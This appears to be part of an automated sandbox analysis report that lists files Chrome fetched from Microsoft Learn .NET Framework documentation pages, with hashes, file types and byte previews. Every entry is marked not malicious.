                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):13842
                                                                                                                                                                                                Entropy (8bit):7.802399161550213
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                                Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):33148
                                                                                                                                                                                                Entropy (8bit):4.917595394577667
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                                MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                                SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                                SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                                SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):5644
                                                                                                                                                                                                Entropy (8bit):4.785769732002188
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                                Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):35005
                                                                                                                                                                                                Entropy (8bit):7.980061050467981
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                                Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):4897
                                                                                                                                                                                                Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                                Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                Entropy (8bit):4.241202481433726
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1173007
                                                                                                                                                                                                Entropy (8bit):5.503893944397598
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):33370
                                                                                                                                                                                                Entropy (8bit):7.973675198531228
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                                                MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                                                SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                                                SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                                                SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/media/event-banners/banner-ignite-2024.jpg
                                                                                                                                                                                                Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1817143
                                                                                                                                                                                                Entropy (8bit):5.501007973622959
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1432
                                                                                                                                                                                                Entropy (8bit):4.986131881931089
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):1154
                                                                                                                                                                                                Entropy (8bit):4.59126408969148
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                                Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):19696
                                                                                                                                                                                                Entropy (8bit):7.9898910353479335
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                                MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                                SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                                SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                                SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                                                Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):33148
                                                                                                                                                                                                Entropy (8bit):4.917595394577667
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                                MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                                SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                                SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                                SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                                Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):35005
                                                                                                                                                                                                Entropy (8bit):7.980061050467981
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
